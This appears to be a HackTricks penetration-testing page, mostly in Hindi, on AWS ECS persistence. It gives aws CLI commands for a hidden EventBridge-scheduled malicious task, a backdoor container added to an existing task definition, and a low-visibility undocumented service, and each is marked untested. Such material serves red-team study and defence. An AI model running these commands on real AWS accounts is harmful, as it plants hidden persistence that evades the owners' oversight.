# AWS - ECS Persistence {{#include ../../../banners/hacktricks-training.md}} ## ECS अधिक जानकारी के लिए देखें: {{#ref}} ../aws-services/aws-ecs-enum.md {{#endref}} ### Hidden Periodic ECS Task > [!NOTE] > TODO: Test An attacker can create a hidden periodic ECS task using Amazon EventBridge to **schedule the execution of a malicious task periodically**. This task can perform reconnaissance, exfiltrate data, or maintain persistence in the AWS account. ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ { "name": "malicious-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": true } ]' # Create an Amazon EventBridge rule to trigger the task periodically aws events put-rule --name "malicious-ecs-task-rule" --schedule-expression "rate(1 day)" # Add a target to the rule to run the malicious ECS task aws events put-targets --rule "malicious-ecs-task-rule" --targets '[ { "Id": "malicious-ecs-task-target", "Arn": "arn:aws:ecs:region:account-id:cluster/your-cluster", "RoleArn": "arn:aws:iam::account-id:role/your-eventbridge-role", "EcsParameters": { "TaskDefinitionArn": "arn:aws:ecs:region:account-id:task-definition/malicious-task", "TaskCount": 1 } } ]' ``` ### Backdoor Container in Existing ECS Task Definition > [!NOTE] > TODO: Test एक हमलावर एक मौजूदा ECS टास्क परिभाषा में एक **छिपा हुआ बैकडोर कंटेनर** जोड़ सकता है जो वैध कंटेनरों के साथ चलता है। बैकडोर कंटेनर का उपयोग स्थिरता और दुर्भावनापूर्ण गतिविधियों को करने के लिए किया जा सकता है। ```bash # Update the existing task definition to include the backdoor container aws ecs register-task-definition --family "existing-task" --container-definitions '[ { "name": "legitimate-container", "image": "legitimate-image:latest", "memory": 256, "cpu": 10, "essential": true }, { "name": "backdoor-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": false } ]' ``` ### Undocumented ECS Service > [!NOTE] > TODO: Test एक हमलावर एक **undocumented ECS service** बना सकता है जो एक दुर्भावनापूर्ण कार्य चलाता है। कार्यों की इच्छित संख्या को न्यूनतम पर सेट करके और लॉगिंग को बंद करके, प्रशासकों के लिए दुर्भावनापूर्ण सेवा को नोटिस करना कठिन हो जाता है। ```bash # Create a malicious task definition aws ecs register-task-definition --family "malicious-task" --container-definitions '[ { "name": "malicious-container", "image": "malicious-image:latest", "memory": 256, "cpu": 10, "essential": true } ]' # Create an undocumented ECS service with the malicious task definition aws ecs create-service --service-name "undocumented-service" --task-definition "malicious-task" --desired-count 1 --cluster "your-cluster" ``` {{#include ../../../banners/hacktricks-training.md}}